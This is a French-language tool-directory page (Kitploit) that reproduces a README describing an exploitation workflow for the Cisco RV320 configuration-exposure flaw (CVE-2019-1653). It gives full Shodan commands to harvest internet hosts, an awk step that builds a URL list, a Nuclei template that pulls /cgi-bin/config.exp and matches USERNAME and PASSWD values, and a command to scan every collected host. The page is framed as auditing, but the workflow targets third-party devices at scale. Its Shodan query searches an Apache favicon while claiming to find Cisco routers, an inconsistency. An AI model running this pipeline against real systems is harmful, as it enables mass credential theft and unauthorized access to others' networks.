Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nuclei-CiscoRV320Dump-CVE-2019-1653 — Modèle Nuclei automatisé et flux de travail Shodan pour détecter et exploiter l'exposition de configuration du routeur Cisco (CVE-2019-1653) pour l'audit de sécurité. | Kitploit
Outils/GitHubGitHub/elzerjp/nuclei-ciscorv320dump-cve-2019-1653
OSINT (Renseignement de Sources Ouvertes)ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'Informations
GitHubelzerjp/nuclei-ciscorv320dump-cve-2019-1653

nuclei-CiscoRV320Dump-CVE-2019-1653

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Modèle Nuclei automatisé et flux de travail Shodan pour détecter et exploiter l'exposition de configuration du routeur Cisco (CVE-2019-1653) pour l'audit de sécurité.

Voir le dépôt
52il y a 1 anPas encore vérifié

Vulnérabilité d'exposition de la configuration des routeurs Cisco Description de la vulnérabilité

Ce référentiel détaille le processus d'exploitation d'une vulnérabilité dans certains routeurs Cisco qui permet l'exposition du fichier de configuration config.exp via une URL publique accessible. Ce fichier peut contenir des informations sensibles, notamment des identifiants (USERNAME et PASSWD), des configurations réseau et d'autres détails critiques du système. S'il est accessible sans authentification, il peut compromettre la sécurité de l'appareil et du réseau sur lequel il est déployé. CVE associé

Cette vulnérabilité pourrait être liée à CVE-2003-1567 et CVE-2019-1653, toutes deux liées à l'exposition non autorisée de fichiers de configuration sur des dispositifs Cisco, bien qu'il soit important de vérifier si l'appareil et le firmware spécifiques correspondent à ces CVE. Guide pas à pas pour l'exploitation

Cette procédure utilise Shodan pour identifier les dispositifs vulnérables, suivie de Nuclei pour scanner et vérifier l'exposition de configurations critiques sur les routeurs Cisco. Prérequis

Compte Shodan : Assurez-vous d'avoir un compte Shodan et que votre clé API soit configurée pour y accéder depuis la ligne de commande.
Nuclei : Installé dans votre environnement, ainsi que le modèle personnalisé Nuclei décrit ci-dessous.
Outils : shodan-cli, awk et httpx pour la conversion d'adresses IP en URLs complètes.

Étape 1 : Rechercher les dispositifs vulnérables sur Shodan

La première étape consiste à identifier les dispositifs vulnérables sur Shodan à l'aide d'une recherche avancée. La requête Shodan suivante recherche les dispositifs qui sont potentiellement des routeurs Cisco :

shodan download apache_results.json.gz "http.favicon.hash:-299287097 Apache"

Cette commande :

Effectue une recherche sur Shodan pour identifier les dispositifs ayant le favicon d'Apache, avec un hash spécifique qui identifie les serveurs potentiellement liés à Apache. Cela est utile dans le cadre d'audits de serveurs.

Étape 2 : Télécharger les résultats et formater les URLs

Une fois que vous avez le fichier apache_results.json.gz, l'étape suivante consiste à extraire les IP et les ports de chaque dispositif pour les formater en URLs complètes, incluant le protocole (http ou https) et le port. Commande pour traiter les données du fichier .json

Utilisez la commande suivante pour extraire les IP et les ports et les formater en URLs complètes dans un fichier nommé urls.txt :

shodan parse --fields ip_str,port,ssl.version apache_results.json.gz |
awk '{if ($2 == 443 || $3 ~ /https/) print "https://"$1":"$2; else print "http://"$1":"$2}' > urls.txt

shodan parse : Extrait les IP et les ports de chaque résultat dans le fichier apache_results.json.gz.
awk : Formate la sortie en URLs complètes, en utilisant https si le port est 443 ou si SSL est détecté, et http dans les autres cas.

Le fichier urls.txt contient désormais des URLs complètes et formatées. Étape 3 : Créer un modèle personnalisé Nuclei

Pour vérifier si le fichier config.exp est accessible sur ces dispositifs, nous allons utiliser un modèle personnalisé Nuclei. Ce modèle tentera d'accéder au fichier et extraira des données sensibles comme USERNAME et PASSWD si elles sont présentes. Modèle Nuclei (cisco-router-config-exposure.yaml)

id: cisco-router-config-exposure info: name: Cisco Router Configuration Exposure author: elzer severity: high description: | Detecta la exposición del archivo config.exp en routers Cisco que contiene credenciales y configuraciones críticas.

tags:

  • cisco
  • router
  • vulnerability
  • cgi-bin
  • config.exp

requests:

  • method: GET path:

    • "{{BaseURL}}/cgi-bin/config.exp"

    matchers-condition: or matchers:

    • type: word words:
      • "Cisco"
      • "config"
      • "version"
    • type: regex regex:
      • "USERNAME=\w+"
      • "PASSWD=[a-f0-9]{32}"

Ce modèle :

Envoie une requête GET au fichier /cgi-bin/config.exp.
Vérifie si la réponse contient des mots-clés ou des modèles spécifiques (Cisco, config, version) pour confirmer l'exposition.
Tente d'extraire les valeurs USERNAME et PASSWD si elles sont présentes dans le fichier.

Enregistrez ce modèle sous le nom cisco-router-config-exposure.yaml dans le dossier des modèles de Nuclei. Étape 4 : Exécuter Nuclei pour détecter les dispositifs vulnérables

Avec le modèle et le fichier urls.txt prêts, exécutez la commande Nuclei suivante pour scanner les URLs :

nuclei -t path/to/cisco-router-config-exposure.yaml -l urls.txt -o resultados_nuclei.txt -debug -vv

-t path/to/cisco-router-config-exposure.yaml : Indique le modèle personnalisé que nous avons créé.
-l urls.txt : Utilise le fichier urls.txt avec les URLs formatées.
-o resultados_nuclei.txt : Enregistre les résultats dans le fichier resultados_nuclei.txt.
-debug -vv : Exécute Nuclei en mode détaillé pour afficher la progression et les détails de débogage.

Résultat

Après l'exécution de Nuclei, le fichier resultados_nuclei.txt contiendra une liste des dispositifs vulnérables qui exposent le fichier de configuration config.exp. Cela inclut tout dispositif renvoyant des identifiants ou des configurations sensibles, ce qui confirme l'exposition de la vulnérabilité. Conclusion

Ce processus vous permet d'identifier et de confirmer l'exposition de fichiers de configuration critiques sur des dispositifs Cisco à l'aide de Shodan et Nuclei. L'automatisation de ce flux est particulièrement utile pour les auditeurs de sécurité et les professionnels de la cybersécurité souhaitant identifier et corriger les configurations non sécurisées dans les réseaux d'entreprise.

Télécharger l’outil